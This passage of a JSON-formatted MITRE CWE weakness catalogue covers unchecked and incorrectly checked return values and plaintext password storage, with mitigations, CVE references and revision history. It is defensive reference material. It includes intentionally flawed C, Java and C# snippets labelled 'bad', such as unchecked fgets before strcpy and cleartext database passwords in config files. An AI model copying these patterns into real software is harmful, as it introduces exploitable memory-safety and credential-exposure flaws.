a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000","@_Chain_ID":"690"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"Ensure that you account for all possible return values from the function."},{"Phase":"Implementation","Description":"When designing a function, make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"Intro_Text":"It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2017-6964","Description":"Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6964"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Ignored function return value"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP00-J","Entry_Name":"Do not ignore values returned by methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-252-resource"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-data"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-resource"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Program Building Blocks" Page 341"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, "Checking Returns" Page 624"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 11: Failure to Handle Errors Correctly." Page 183"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-data"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-252-resource"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-252-resource"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example and suggested CERT reference"}}},"253":{"attr":{"@_ID":"253","@_Name":"Incorrect Check of Function Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software incorrectly checks a return value from a function, which prevents the software from detecting errors or exceptional conditions.","Extended_Description":"Important and common functions will return some value about the success of its actions. This will alert the program whether or not to handle any errors caused by that function.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language or compiler that uses exceptions and requires the catching of those exceptions."},{"Phase":"Implementation","Description":"Properly check all functions which return a value."},{"Phase":"Implementation","Description":"When designing any function make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to allocate memory for 4 integers and checks if the allocation succeeds.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"tmp = malloc(sizeof(int) * 4);if (tmp < 0 ) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"perror(\\"Failure\\");","xhtml:br":["",""],"xhtml:i":"//should have checked if the call returned 0"}}}},"Body_Text":"The code assumes that only a negative return value would indicate an error, but malloc() may return a null pointer when there is an error. The value of tmp could then be equal to 0, and the error would be missed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Misinterpreted function return value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Return Value Testing and Interpretation", Page 340"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Misinterpreted Function Return Value","attr":{"@_Date":"2009-03-10"}}}},"256":{"attr":{"@_ID":"256","@_Name":"Plaintext Storage of a Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Storing a password in plaintext may result in a system compromise.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties, configuration file, or memory. Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. In some contexts, even storage of a plaintext password in memory is considered a security risk if the password is not cleared immediately after it is used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Architecture and Design","Note":"Developers sometimes believe that they cannot defend the application from someone who has access to the configuration, but this belief makes an attacker\'s job easier."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."},{"Description":"A programmer might attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password because the encoding can be detected and decoded easily.","Effectiveness":"None"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, 